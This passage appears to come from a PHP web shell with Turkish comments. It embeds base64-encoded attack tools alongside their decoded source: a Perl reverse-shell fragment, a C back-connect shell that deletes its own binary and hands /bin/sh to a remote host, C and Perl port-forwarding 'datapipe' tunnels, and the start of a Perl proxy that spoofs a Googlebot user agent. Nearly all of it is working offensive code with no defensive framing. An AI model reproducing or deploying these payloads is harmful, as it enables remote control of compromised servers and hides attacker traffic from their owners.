connect(SOCKET, $paddr) || die("Error: $!\n");

3245
3246
open(STDIN, ">&SOCKET");

3247
3248
open(STDOUT, ">&SOCKET");

3249
3250
open(STDERR, ">&SOCKET");

3251
3252
system($system);

3253
3254
close(STDIN);

3255
3256
close(STDOUT);

3257
3258
close(STDERR);

3259
3260
3261
3262
*/

3263
3264
3265
3266
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC

3267
3268
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb

3269
3270
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd

3271
3272
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ

3273
3274
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC

3275
3276
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D

3277
3278
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp

3279
3280
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

3281
3282
3283
3284
3285
3286
/* ?ST SATIRIN KIRILMI? HAL? */

3287
3288
/*

3289
3290
3291
3292
#include <stdio.h>

3293
3294
#include <sys/socket.h>

3295
3296
#include <netinet/in.h>

3297
3298
int main(int argc, char *argv[])

3299
3300
{

3301
3302
 int fd;

3303
3304
 struct sockaddr_in sin;

3305
3306
 char rms[21]="rm -f "; 

3307
3308
 daemon(1,0);

3309
3310
 sin.sin_family = AF_INET;

3311
3312
 sin.sin_port = htons(atoi(argv[2]));

3313
3314
 sin.sin_addr.s_addr = inet_addr(argv[1]); 

3315
3316
 bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); 

3317
3318
 fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 

3319
3320
 if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {

3321
3322
   perror("[-] connect()");

3323
3324
   exit(0);

3325
3326
 }

3327
3328
 strcat(rms, argv[0]);

3329
3330
 system(rms);  

3331
3332
 dup2(fd, 0);

3333
3334
 dup2(fd, 1);

3335
3336
 dup2(fd, 2);

3337
3338
 execl("/bin/sh","sh -i", NULL);

3339
3340
 close(fd); 

3341
3342
}

3343
3344
3345
3346
*/

3347
3348
3349
3350
3351
3352
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2

3353
3354
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb

3355
3356
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj

3357
3358
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ

3359
3360
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm

3361
3362
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga

3363
3364
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy

3365
3366
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV

3367
3368
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow

3369
3370
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb

3371
3372
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l

3373
3374
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA

3375
3376
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS

3377
3378
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC

3379
3380
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh

3381
3382
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ

3383
3384
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC

3385
3386
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D

3387
3388
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh

3389
3390
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0

3391
3392
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay

3393
3394
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c

3395
3396
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy

3397
3398
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA

3399
3400
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci

3401
3402
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ

3403
3404
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu

3405
3406
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0

3407
3408
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC

3409
3410
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI

3411
3412
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp

3413
3414
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs

3415
3416
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG

3417
3418
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL

3419
3420
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp

3421
3422
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo

3423
3424
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm

3425
3426
lsZSk7DQogIHJldHVybiAwOw0KfQ==";

3427
3428
3429
3430
/* ?ST SATIRIN KIRILMI? HAL? */

3431
3432
/*

3433
3434
3435
3436
#include <sys/types.h>

3437
3438
#include <sys/socket.h>

3439
3440
#include <sys/wait.h>

3441
3442
#include <netinet/in.h>

3443
3444
#include <stdio.h>

3445
3446
#include <stdlib.h>

3447
3448
#include <errno.h>

3449
3450
#include <unistd.h>

3451
3452
#include <netdb.h>

3453
3454
#include <linux/time.h>

3455
3456
#ifdef STRERROR

3457
3458
extern char *sys_errlist[];

3459
3460
extern int sys_nerr;

3461
3462
char *undef = "Undefined error";

3463
3464
char *strerror(error)  

3465
3466
int error;  

3467
3468
{ 

3469
3470
if (error > sys_nerr)

3471
3472
return undef;

3473
3474
return sys_errlist[error];

3475
3476
}

3477
3478
#endif

3479
3480
3481
3482
main(argc, argv)  

3483
3484
  int argc;  

3485
3486
  char **argv;  

3487
3488
{ 

3489
3490
  int lsock, csock, osock;

3491
3492
  FILE *cfile;

3493
3494
  char buf[4096];

3495
3496
  struct sockaddr_in laddr, caddr, oaddr;

3497
3498
  int caddrlen = sizeof(caddr);

3499
3500
  fd_set fdsr, fdse;

3501
3502
  struct hostent *h;

3503
3504
  struct servent *s;

3505
3506
  int nbyt;

3507
3508
  unsigned long a;

3509
3510
  unsigned short oport;

3511
3512
3513
3514
  if (argc != 4) {

3515
3516
    fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);

3517
3518
    return 30;

3519
3520
  }

3521
3522
  a = inet_addr(argv[3]);

3523
3524
  if (!(h = gethostbyname(argv[3])) &&

3525
3526
      !(h = gethostbyaddr(&a, 4, AF_INET))) {

3527
3528
    perror(argv[3]);

3529
3530
    return 25;

3531
3532
  }

3533
3534
  oport = atol(argv[2]);

3535
3536
  laddr.sin_port = htons((unsigned short)(atol(argv[1])));

3537
3538
  if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {

3539
3540
    perror("socket");

3541
3542
    return 20;

3543
3544
  }

3545
3546
  laddr.sin_family = htons(AF_INET);

3547
3548
  laddr.sin_addr.s_addr = htonl(0);

3549
3550
  if (bind(lsock, &laddr, sizeof(laddr))) {

3551
3552
    perror("bind");

3553
3554
    return 20;

3555
3556
  }

3557
3558
  if (listen(lsock, 1)) {

3559
3560
    perror("listen");

3561
3562
    return 20;

3563
3564
  }

3565
3566
  if ((nbyt = fork()) == -1) {

3567
3568
    perror("fork");

3569
3570
    return 20;

3571
3572
  }

3573
3574
  if (nbyt > 0)

3575
3576
    return 0;

3577
3578
  setsid();

3579
3580
  while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {

3581
3582
    cfile = fdopen(csock,"r+");

3583
3584
    if ((nbyt = fork()) == -1) {

3585
3586
      fprintf(cfile, "500 fork: %s\n", strerror(errno));

3587
3588
      shutdown(csock,2);

3589
3590
      fclose(cfile);

3591
3592
      continue;

3593
3594
    }

3595
3596
    if (nbyt == 0)

3597
3598
      goto gotsock;

3599
3600
    fclose(cfile);

3601
3602
    while (waitpid(-1, NULL, WNOHANG) > 0);

3603
3604
  }

3605
3606
  return 20;

3607
3608
3609
3610
 gotsock:

3611
3612
  if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {

3613
3614
    fprintf(cfile, "500 socket: %s\n", strerror(errno));

3615
3616
    goto quit1;

3617
3618
  }

3619
3620
  oaddr.sin_family = h->h_addrtype;

3621
3622
  oaddr.sin_port = htons(oport);

3623
3624
  memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);

3625
3626
  if (connect(osock, &oaddr, sizeof(oaddr))) {

3627
3628
    fprintf(cfile, "500 connect: %s\n", strerror(errno));

3629
3630
    goto quit1;

3631
3632
  }

3633
3634
  while (1) {

3635
3636
    FD_ZERO(&fdsr);

3637
3638
    FD_ZERO(&fdse);

3639
3640
    FD_SET(csock,&fdsr);

3641
3642
    FD_SET(csock,&fdse);

3643
3644
    FD_SET(osock,&fdsr);

3645
3646
    FD_SET(osock,&fdse);

3647
3648
    if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {

3649
3650
      fprintf(cfile, "500 select: %s\n", strerror(errno));

3651
3652
      goto quit2;

3653
3654
    }

3655
3656
    if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {

3657
3658
      if ((nbyt = read(csock,buf,4096)) <= 0)

3659
3660
	goto quit2;

3661
3662
      if ((write(osock,buf,nbyt)) <= 0)

3663
3664
	goto quit2;

3665
3666
    } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {

3667
3668
      if ((nbyt = read(osock,buf,4096)) <= 0)

3669
3670
	goto quit2;

3671
3672
      if ((write(csock,buf,nbyt)) <= 0)

3673
3674
	goto quit2;

3675
3676
    }

3677
3678
  }

3679
3680
3681
3682
 quit2:

3683
3684
  shutdown(osock,2);

3685
3686
  close(osock);

3687
3688
 quit1:

3689
3690
  fflush(cfile);

3691
3692
  shutdown(csock,2);

3693
3694
 quit0:

3695
3696
  fclose(cfile);

3697
3698
  return 0;

3699
3700
}

3701
3702
3703
3704
*/

3705
3706
3707
3708
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I

3709
3710
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl

3711
3712
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU

3713
3714
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol

3715
3716
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC

3717
3718
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy

3719
3720
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ

3721
3722
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2

3723
3724
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ

3725
3726
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN

3727
3728
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9

3729
3730
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi

3731
3732
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc

3733
3734
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp

3735
3736
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ

3737
3738
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW

3739
3740
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK

3741
3742
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g

3743
3744
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0

3745
3746
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG

3747
3748
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I

3749
3750
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs

3751
3752
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J

3753
3754
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";

3755
3756
3757
3758
/* ?ST SATIRIN KIRILMI? HAL? */

3759
3760
/*

3761
3762
3763
3764
#!/usr/bin/perl

3765
3766
use IO::Socket;

3767
3768
use POSIX;

3769
3770
$localport = $ARGV[0];

3771
3772
$host      = $ARGV[1];

3773
3774
$port      = $ARGV[2];

3775
3776
$daemon=1;

3777
3778
$DIR = undef;

3779
3780
$| = 1;

3781
3782
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }

3783
3784
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);

3785
3786
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";

3787
3788
$SIG{'CHLD'} = 'IGNORE';

3789
3790
$num = 0;

3791
3792
while (1) { 

3793
3794
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }

3795
3796
++$num;

3797
3798
$pid = fork();

3799
3800
if (!defined($pid)) { print STDERR "$!\n"; } 

3801
3802
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); } 

3803
3804
else { $ch->close(); }

3805
3806
}

3807
3808
sub Run {

3809
3810
my($o, $ch, $num) = @_;

3811
3812
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});

3813
3814
if (!$th) { exit 0; }

3815
3816
my $fh;

3817
3818
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }

3819
3820
$ch->autoflush();

3821
3822
$th->autoflush();

3823
3824
while ($ch || $th) {

3825
3826
my $rin = "";

3827
3828
vec($rin, fileno($ch), 1) = 1 if $ch;

3829
3830
vec($rin, fileno($th), 1) = 1 if $th;

3831
3832
my($rout, $eout);

3833
3834
select($rout = $rin, undef, $eout = $rin, 120);

3835
3836
if (!$rout  &&  !$eout) {}

3837
3838
my $cbuffer = "";

3839
3840
my $tbuffer = "";

3841
3842
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {

3843
3844
my $result = sysread($ch, $tbuffer, 1024);

3845
3846
if (!defined($result)) {

3847
3848
print STDERR "$!\n";

3849
3850
exit 0;

3851
3852
}

3853
3854
if ($result == 0) { exit 0; }

3855
3856
}

3857
3858
if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {

3859
3860
my $result = sysread($th, $cbuffer, 1024);

3861
3862
if (!defined($result)) { print STDERR "$!\n"; exit 0; }

3863
3864
if ($result == 0) {exit 0;}

3865
3866
}

3867
3868
if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}

3869
3870
while (my $len = length($tbuffer)) {

3871
3872
my $res = syswrite($th, $tbuffer, $len);

3873
3874
if ($res > 0) {$tbuffer = substr($tbuffer, $res);} 

3875
3876
else {print STDERR "$!\n";}

3877
3878
}

3879
3880
while (my $len = length($cbuffer)) {

3881
3882
my $res = syswrite($ch, $cbuffer, $len);

3883
3884
if ($res > 0) {$cbuffer = substr($cbuffer, $res);} 

3885
3886
else {print STDERR "$!\n";}

3887
3888
}}}

3889
3890
3891
3892
3893
3894
*/

3895
3896
3897
3898
$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn

3899
3900
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT

3901
3902
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE

3903
3904
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09

3905
3906
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS

3907
3908
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd

3909
3910
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk

3911
3912
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1

3913
3914
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi

3915
3916
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK

3917
3918
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg

3919
3920
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA

3921
3922
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG

3923
3924
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI

3925
3926
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt

3927
3928
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN

3929
3930
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG

3931
3932
